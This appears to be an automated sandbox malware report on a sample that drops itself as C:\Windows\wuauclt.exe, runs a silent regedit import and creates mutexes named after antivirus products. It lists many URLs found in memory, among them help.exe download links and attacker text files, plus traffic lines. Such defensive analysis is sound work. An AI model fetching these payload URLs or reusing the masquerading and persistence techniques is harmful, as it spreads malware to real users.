Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/ie.txt
Source: wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/ie.txt&
Source: wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/ie.txt)
Source: wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/ie.txt-
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/ie.txtSia
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/ie.txtZin
Source: wuauclt.exe, 0000002A.00000002.2234954053.0000000000597000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/ie.txtp1
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/ie.txt~n
Source: wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234156390.00000000023B2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/tean1.txt
Source: wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/tean1.txt&
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/tean1.txt8U
Source: wuauclt.exe, 00000004.00000003.2081368568.00000000006E5000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.00000000006DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/tean1.txtB
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/tean1.txtGE
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/tean1.txtJS;.JSE;.WSF;.WSH;#F
Source: wuauclt.exe, 0000002A.00000003.2234264885.0000000000606000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000002.2235364430.0000000000606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://msg.tmhacker.com/tean1.txtME
Source: sxs.exe, 00000000.00000003.2016117630.0000000000740000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177702991.00000000021E0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://w.tw7890.com/
Source: wuauclt.exe, 0000002A.00000002.2234954053.000000000055B000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234129206.00000000023B5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dvdforone.com
Source: explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000002.2804925525.0000000000533000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dvdforone.com/
Source: explorer.exe, 0000002E.00000003.2804701070.0000000000572000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dvdforone.com/0M
Source: explorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dvdforone.com/23
Source: explorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dvdforone.com/4b823s
Source: explorer.exe, 0000002E.00000003.2804701070.0000000000572000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000002.2804925525.0000000000573000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002E.00000003.2804551864.0000000000565000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dvdforone.com/C:
Source: explorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dvdforone.com/Vh
Source: explorer.exe, 0000002E.00000002.2804925525.0000000000544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dvdforone.com/Zy
Source: explorer.exe, 0000002D.00000002.2208846931.0000000000E83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dvdforone.com/o
Source: wuauclt.exe, 0000002A.00000002.2235700906.0000000002220000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002D.00000002.2208846931.0000000000E60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dvdforone.comC:
Source: sxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.gamesrb.com/rbm/help.exe
Source: sxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.hg7890.com/hgb/help.exe
Source: sxs.exe, sxs.exe, 00000000.00000003.2016766274.0000000000740000.00000040.00001000.00020000.00000000.sdmp, sxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000002.00000002.3252602889.0000000000100000.00000040.00000400.00020000.00000000.sdmp, wuauclt.exe, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2180435124.0000000002310000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 0000002B.00000002.3252569275.0000000000D50000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.om7890.com/mfx/help.exe
Source: sxs.exe, 00000000.00000002.2041399746.000000000084B000.00000004.00000020.00020000.00000000.sdmp, sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmp, sxs.exe, 00000000.00000003.2035087789.0000000002175000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043412825.0000000002908000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253732346.0000000002105000.00000004.00001000.00020000.00000000.sdmp, wuauclt.exe, 00000004.00000002.3253380639.000000000066E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2101961189.00000000029A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com
Source: explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com(
Source: explorer.exe, 0000000C.00000002.2676562250.0000000001463000.00000004.00000020.00020000.00000000.sdmp, chromecache_94.8.drString found in binary or memory: http://www.onefordvd.com/
Source: explorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/&
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/)
Source: explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/10
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/23M4
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/4b823
Source: explorer.exe, 0000000C.00000002.2676562250.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/6x
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/A
Source: explorer.exe, 0000000C.00000003.2676269391.000000000148B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.000000000148C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/W
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/Y
Source: explorer.exe, 00000003.00000002.2043412825.0000000002908000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/c%1
Source: explorer.exe, 00000005.00000003.2638770707.0000000000F60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2638890708.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2639171790.0000000000F83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/i
Source: explorer.exe, 0000000C.00000003.2676269391.000000000148B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.000000000148C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/l
Source: explorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/n
Source: explorer.exe, 0000000C.00000003.2676269391.000000000148B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.000000000148C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/s.lll
Source: explorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/t
Source: explorer.exe, 00000009.00000002.2101961189.00000000029A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/v
Source: explorer.exe, 0000000C.00000003.2676356523.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2676620417.00000000014AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com/~
Source: explorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com2
Source: sxs.exe, 00000000.00000003.2035198425.0000000002281000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043084095.0000000002840000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2098672056.0000000002880000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2101961189.00000000029A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.comC:
Source: sxs.exe, 00000000.00000003.2035087789.0000000002175000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.comXV
Source: sxs.exe, 00000000.00000002.2041399746.0000000000868000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.com_
Source: explorer.exe, 00000003.00000002.2043412825.0000000002900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.come
Source: sxs.exe, 00000000.00000002.2041399746.000000000084B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.onefordvd.comop
Source: sxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tw7890.com/twv/help.exe
Source: sxs.exe, 00000000.00000003.2016130183.0000000000750000.00000040.00001000.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2177763585.00000000021F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.tw7890.com/twv/help.exehttp://www.om7890.com/mfx/help.exehttp://www.hg7890.com/hgb/help.e
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.xxx.com/abc.exe
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.xxx.com/ie.txt
Source: wuauclt.exe, wuauclt.exe, 0000002A.00000002.2234707421.0000000000401000.00000004.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.xxx.com/qqmsg.txt
Source: chromecache_90.8.drString found in binary or memory: https://btloader.com/tag?o=5097926782615552&upapi=true
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://fonts.googleapis.com/css?family=
Source: chromecache_90.8.drString found in binary or memory: https://img1.wsimg.com/parking-lander/static/css/main.ef90a627.css
Source: chromecache_90.8.drString found in binary or memory: https://img1.wsimg.com/parking-lander/static/js/main.5bbf83b7.js
Source: wuauclt.exe, 0000002A.00000002.2235055048.00000000005B8000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2234500669.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, wuauclt.exe, 0000002A.00000003.2198638536.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.li
Source: sxs.exe, 00000000.00000002.2041399746.0000000000820000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comC
Source: wuauclt.exe, 00000004.00000002.3253380639.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comx
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://partner.googleadservices.com/gampad/cookie.js
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://syndicatedsearch.goog
Source: chromecache_90.8.drString found in binary or memory: https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://www.google.com/pagead/1p-conversion/16521530460/?gad_source=1&adview_type=5
Source: chromecache_98.8.dr, chromecache_104.8.dr, chromecache_106.8.dr, chromecache_108.8.drString found in binary or memory: https://www.googleadservices.com/pagead/conversion/16521530460/?gad_source=1&adview_type=3
Source: unknownNetwork traffic detected: HTTP traffic on port 53755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53749
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53747
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53743
Source: unknownNetwork traffic detected: HTTP traffic on port 53799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 53800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53758
Source: unknownNetwork traffic detected: HTTP traffic on port 53752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53756
Source: unknownNetwork traffic detected: HTTP traffic on port 53794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53753
Source: unknownNetwork traffic detected: HTTP traffic on port 53763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 53780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
Source: unknownNetwork traffic detected: HTTP traffic on port 53751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
Source: unknownNetwork traffic detected: HTTP traffic on port 53759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
Source: unknownNetwork traffic detected: HTTP traffic on port 53774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
Source: unknownNetwork traffic detected: HTTP traffic on port 53797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53809
Source: unknownNetwork traffic detected: HTTP traffic on port 53779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
Source: unknownNetwork traffic detected: HTTP traffic on port 53811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53777
Source: unknownNetwork traffic detected: HTTP traffic on port 53765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
Source: unknownNetwork traffic detected: HTTP traffic on port 53786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53789
Source: unknownNetwork traffic detected: HTTP traffic on port 53795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
Source: unknownNetwork traffic detected: HTTP traffic on port 53792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
Source: unknownNetwork traffic detected: HTTP traffic on port 53762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
Source: unknownNetwork traffic detected: HTTP traffic on port 53773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53797
Source: unknownNetwork traffic detected: HTTP traffic on port 53798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53770 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:53760 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:53773 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:53799 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:53809 version: TLS 1.2

System Summary

barindex
Uses regedit.exe to modify the Windows registry
Source: C:\Windows\wuauclt.exeProcess created: C:\Windows\SysWOW64\regedit.exe "C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.reg
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_00404A98 PostQuitMessage,NtdllDefWindowProc_A,0_2_00404A98
Source: C:\Windows\wuauclt.exeCode function: 4_2_00404A98 PostQuitMessage,NtdllDefWindowProc_A,4_2_00404A98
Source: C:\Windows\wuauclt.exeCode function: 42_2_00404A98 PostQuitMessage,NtdllDefWindowProc_A,42_2_00404A98
Source: C:\Users\user\Desktop\sxs.exeFile created: C:\Windows\wuauclt.exeJump to behavior
Source: C:\Users\user\Desktop\sxs.exeFile created: C:\Windows\wuauclt.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\sxs.exeFile created: C:\Windows\noruns.regJump to behavior
Source: C:\Windows\wuauclt.exeFile deleted: C:\Windows\noruns.regJump to behavior
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_3_00700C120_3_00700C12
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004069280_2_00406928
Source: C:\Windows\wuauclt.exeCode function: 4_3_005F0C124_3_005F0C12
Source: C:\Windows\wuauclt.exeCode function: 4_2_004069284_2_00406928
Source: C:\Windows\wuauclt.exeCode function: 42_3_02330C1242_3_02330C12
Source: C:\Windows\wuauclt.exeCode function: 42_2_0040692842_2_00406928
Source: C:\Users\user\Desktop\sxs.exeCode function: String function: 00403B5C appears 34 times
Source: C:\Users\user\Desktop\sxs.exeCode function: String function: 00404DD0 appears 36 times
Source: C:\Users\user\Desktop\sxs.exeCode function: String function: 00404854 appears 32 times
Source: C:\Users\user\Desktop\sxs.exeCode function: String function: 00403D4C appears 38 times
Source: C:\Windows\wuauclt.exeCode function: String function: 00403B5C appears 68 times
Source: C:\Windows\wuauclt.exeCode function: String function: 00404324 appears 34 times
Source: C:\Windows\wuauclt.exeCode function: String function: 00404DD0 appears 76 times
Source: C:\Windows\wuauclt.exeCode function: String function: 00404854 appears 64 times
Source: C:\Windows\wuauclt.exeCode function: String function: 004039F4 appears 44 times
Source: C:\Windows\wuauclt.exeCode function: String function: 00403D4C appears 78 times
Source: C:\Windows\wuauclt.exeCode function: String function: 00403BA0 appears 60 times
Source: sxs.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: sxs.exeStatic PE information: Section: es2z2 ZLIB complexity 1.1896551724137931
Source: wuauclt.exe.0.drStatic PE information: Section: es2z2 ZLIB complexity 1.1896551724137931
Source: classification engineClassification label: mal100.spre.evad.winEXE@103/58@67/16
Source: C:\Users\user\Desktop\sxs.exeCode function: 0_2_004047BC CreateToolhelp32Snapshot,0_2_004047BC
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Windows\wuauclt.exeMutant created: \Sessions\1\BaseNamedObjects\KingsoftAntivirusScanProgram7Mutex
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\wuauclt.exeMutant created: \Sessions\1\BaseNamedObjects\SKYNET_PERSONAL_FIREWALL
Source: C:\Windows\wuauclt.exeMutant created: \Sessions\1\BaseNamedObjects\ASSISTSHELLMUTEX
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8036:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\wuauclt.exeMutant created: \Sessions\1\BaseNamedObjects\AntiTrojan3721
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
